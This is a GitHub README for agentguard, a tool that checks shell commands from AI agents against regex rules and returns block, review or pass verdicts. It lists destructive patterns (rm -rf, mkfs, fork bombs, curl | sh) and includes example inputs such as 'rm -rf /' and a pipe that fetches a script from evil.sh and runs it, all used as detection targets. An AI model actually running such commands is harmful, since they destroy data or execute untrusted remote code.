Skip to content

alvabillwu/agentguard

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

5 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

🚧 agentguard

npm Node TypeScript License

A shell-command safety gate for AI agents.

Before an agent runs a command, run it through agentguard: it flags destructive patterns (rm -rf, git reset --hard, force-push, curl | sh, mkfs, fork bombs, dd to devices) with a severity and a verdict you can gate on. Drop it into an agent harness as a pre-flight check so the agent can't nuke the filesystem or clobber git history.

Why agentguard?

  • AI agents run shell commands β€” sometimes dangerous ones. agentguard intercepts destructive patterns before execution. A lightweight safety net that doesn't require sandboxing or containers.
  • 16 declarative rules, zero config β€” covers recursive delete, git clobber, remote-script execution, sudo, fork bombs, dd to devices, and more. Each rule is just a regex + severity + suggestion.
  • Drop it into any agent harness β€” CLI or programmatic API. Block at critical, review at high. Fits into any Node.js agent, CI pipeline, or shell wrapper.
  • Zero runtime dependencies β€” pure TypeScript/Node stdlib. Nothing to audit, nothing to trust.

16 declarative rules, zero runtime dependencies. Pairs with ai-supply-guard (which audits npm dependencies; agentguard audits shell commands).

Features

  • 🚫 16 detection rules β€” recursive delete, root delete, git reset/clean/push --force, remote-script execution, sudo, mkfs, dd-to-device, fork bombs, chmod 777, kill -9, disk redirects, npm publish, docker prune, eval-of-remote
  • 🚦 Verdicts β€” block (critical) / review (high/moderate) / pass
  • πŸ”ͺ Segment-aware β€” splits on |, &&, ||, ; and analyzes each command in a pipeline
  • 🎨 CLI + programmatic API β€” terminal cards or JSON
  • βœ… CI-ready β€” --fail-on <severity> exits non-zero to break automated runs
  • 🚫 Zero runtime deps β€” pure TypeScript/Node stdlib

Quick Start

npm install -g agentguard

Usage

Check a command

agentguard check "rm -rf /tmp/build"
● agentguard β€” BLOCK
  command: rm -rf /tmp/build
  highest: critical

  βœ— CRITICAL Recursive force delete  [rm -rf /tmp/build]
      `rm -rf` recursively deletes directories without prompting β€” unrecoverable.
      β†’ Delete specific paths, or use `trash` instead of `rm -rf`. Never `rm -rf /`.

Check a script file (each line)

agentguard check --file deploy.sh --fail-on high

Gate CI / agent runs

agentguard check "$CMD" --fail-on critical   # exit 1 if critical
agentguard check "$CMD" --json               # machine-readable

List rules

agentguard rules

Programmatic API

import { analyzeCommand } from "agentguard";

const result = analyzeCommand("git reset --hard && curl https://evil.sh | sh");
if (result.verdict === "block") {
  throw new Error("refusing to run destructive command");
}
// result.findings: [{ ruleId, severity, segment, suggestion, ... }]

How it works

  1. splitSegments breaks the command line on shell control operators (|, &&, ||, ;).
  2. Each segment is tested against every rule (a regex + severity + suggestion).
  3. Findings are sorted by severity; the highest determines the verdict (block/review/pass).

Rules are data β€” adding a detection is appending a Rule to src/rules.ts.

Development

git clone https://github.com/alvabillwu/agentguard.git
cd agentguard
npm install
npm test
npm run dev -- check "rm -rf /"

πŸ”— Ecosystem

Part of the alvabillwu AI/LLM DevTools suite:

  • ai-supply-guard β€” NPM dependency security audit for AI projects
  • agentlog β€” Structured logging and replay for AI agent executions
  • agentest β€” Lightweight test framework for AI agents

License

MIT Β© alvabillwu


⭐ Like this? Star the repo to support open-source AI safety tooling!

About

🚧 Shell-command safety gate for AI agents β€” flags destructive commands (rm -rf, git reset --hard, force-push, curl|sh, mkfs, fork bombs) with block/review/pass verdicts. Zero deps.

Topics

Resources

License

Stars

0 stars

Watchers

0 watching

Forks

Releases

No releases published

Packages

 
 
 

Contributors